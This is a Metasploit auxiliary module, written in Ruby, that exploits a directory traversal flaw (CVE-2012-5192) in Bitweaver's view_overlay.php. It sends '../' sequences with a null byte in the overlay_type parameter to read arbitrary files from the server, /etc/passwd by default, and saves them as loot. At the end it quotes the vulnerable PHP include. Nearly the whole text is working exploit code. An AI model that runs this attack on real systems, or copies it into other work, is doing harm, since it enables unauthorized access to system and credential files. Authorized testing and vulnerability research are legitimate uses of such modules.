Bitweaver Overlay_type Directory Traversal

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Bitweaver overlay_type Directory Traversal',  
'Description' => %q{  
This module exploits a directory traversal vulnerability found in Bitweaver.  
When handling the 'overlay_type' parameter, view_overlay.php fails to do any  
path checking/filtering, which can be abused to read any file outside the  
virtual directory.  
},  
'References' =>  
[  
['CVE', '2012-5192'],  
['OSVDB', '86599'],  
['EDB', '22216'],  
['URL', 'https://www.trustwave.com/spiderlabs/advisories/TWSL2012-016.txt']  
],  
'Author' =>  
[  
'David Aaron', # Trustwave SpiderLabs  
'Jonathan Claudius', # Trustwave SpiderLabs  
'sinn3r' # Metasploit  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2012-10-23'  
))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The URI path to the web application', '/bitweaver/']),  
OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),  
OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])  
])  
end  
  
  
def run_host(ip)  
base = target_uri.path  
  
peer = "#{ip}:#{rport}"  
fname = datastore['FILE']  
fname = fname[1, fname.length] if fname =~ /^\//  
  
print_status("Reading '#{datastore['FILE']}'")  
traverse = "../" * datastore['DEPTH']  
res = send_request_cgi({  
'method' => 'GET',  
'encode_params' => false,  
'uri' => normalize_uri(base, "gmap/view_overlay.php"),  
'vars_get' => {  
'overlay_type' => "#{traverse}#{fname}%00"  
}  
})  
  
if res and res.code == 200 and res.body =~ /failed to open stream\: No such file/  
print_error("Cannot read '#{fname}'. File does not exist.")  
  
elsif res and res.code == 200 and res.body =~ /failed to open stream\: Permission denied/  
print_error("Cannot read '#{fname}'. Permission denied.")  
  
elsif res and res.code == 200 and res.body =~ /Failed opening required/  
print_error("Cannot read '#{fname}'. Possibly not vulnerable.")  
  
elsif res and res.code == 200  
data = res.body  
data = (data.scan(/(.+)\n(<br \/>)*\n*.+Notice.+/m).flatten[0] || '').gsub(/\n<br \/>$/, '')  
  
p = store_loot(  
'bitweaver.overlay_type',  
'application/octet-stream',  
ip,  
data,  
fname  
)  
  
vprint_line(data)  
print_good("#{datastore['FILE']} stored as '#{p}'")  
  
else  
print_error("Request failed due to some unknown reason")  
end  
end  
end  
  
=begin  
if( !empty( $_REQUEST['overlay_type'] ) ){  
$type = $_REQUEST['overlay_type'];  
}  
  
// Now check permissions to access this page  
$gBitSystem->verifyPermission('p_gmap_overlay_view' );  
  
// Get the overlay for specified overylay_id  
require_once(GMAP_PKG_PATH.'lookup_'.$type.'_inc.php' );  
=end  
`